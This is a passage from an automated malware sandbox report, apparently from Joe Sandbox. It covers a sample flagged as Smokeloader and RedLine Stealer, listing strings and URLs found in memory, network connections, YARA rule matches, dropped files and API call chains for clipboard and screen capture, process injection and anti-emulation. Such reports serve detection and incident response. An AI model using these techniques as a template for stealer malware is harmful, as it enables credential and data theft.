                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
                Source: 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://help.steampowered.com/en/
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                Source: HCFIII.9.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49747 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52653 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52659 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:52660 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52661 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:52662 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: Yara match, File source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, Code function: 6_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,6_2_0042EAB0
                Source: C:\Users\user\AppData\Local\Temp\F441.exe, Code function: 6_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,6_2_0042EC90
                Source: Yara match, File source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR

                System Summary

                Source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                Source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                Source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                Source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                Source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                Source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_4e31426e, Author: unknown
                Source: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_4e31426e, Author: unknown
                Source: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                Source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_4e31426e, Author: unknown
                Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                Source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                Source: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                Source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_4e31426e, Author: unknown
                Source: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                Source: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                Source: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                Source: C:\Windows\explorer.exe, Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\4.exe, Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401615
                Source: C:\Users\user\Desktop\4.exe, Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401658
                Source: C:\Users\user\Desktop\4.exe, Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401620
                Source: C:\Users\user\Desktop\4.exe, Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401524
                Source: C:\Users\user\Desktop\4.exe, Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040162D
                Source: C:\Users\user\Desktop\4.exe, Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401635
                Source: C:\Users\user\AppData\Roaming\sdveeeu, Code function: 5_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401615
                Source: C:\Users\user\AppData\Roaming\sdveeeu, Code function: 5_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401658
                Source: C:\Users\user\AppData\Roaming\sdveeeu, Code function: 5_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401620
                Source: C:\Users\user\AppData\Roaming\sdveeeu, Code function: 5_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401524
                Source: C:\Users\user\AppData\Roaming\sdveeeu, Code function: 5_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_0040162D
                Source: C:\Users\user\AppData\Roaming\sdveeeu, Code function: 5_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401635
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe, Code function: 8_2_04299B10 NtProtectVirtualMemory,NtProtectVirtualMemory,8_2_04299B10
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe, Code function: 8_2_0429A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,8_2_0429A4F0
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exe, Code function: 8_2_04299850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,8_2_04299850
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp, Code function: 9_2_6D0C62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,9_2_6D0C62C0
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\HJJJECFIECBG\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\HJJJECFIECBG\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Code function: String function: 004087A0 appears 54 times
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Code function: String function: 0040F5A0 appears 139 times
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Code function: String function: 020FF807 appears 139 times
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Code function: String function: 020F8A07 appears 57 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: String function: 6D0CD930 appears 57 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: String function: 6D0C09D0 appears 305 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: String function: 6CF69B10 appears 98 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: String function: 6D079F30 appears 52 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: String function: 6CF63620 appears 95 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: String function: 6CF9C5E0 appears 35 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp Code function: String function: 6D0CDAE0 appears 72 times
                Source: C:\Users\user\AppData\Local\Temp\F441.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 1640
                Source: 4.exe, 00000000.00000002.1712269261.0000000002C8C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesFilezera2 vs 4.exe
                Source: 4.exe Binary or memory string: OriginalFilenamesFilezera2 vs 4.exe
                Source: 4.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
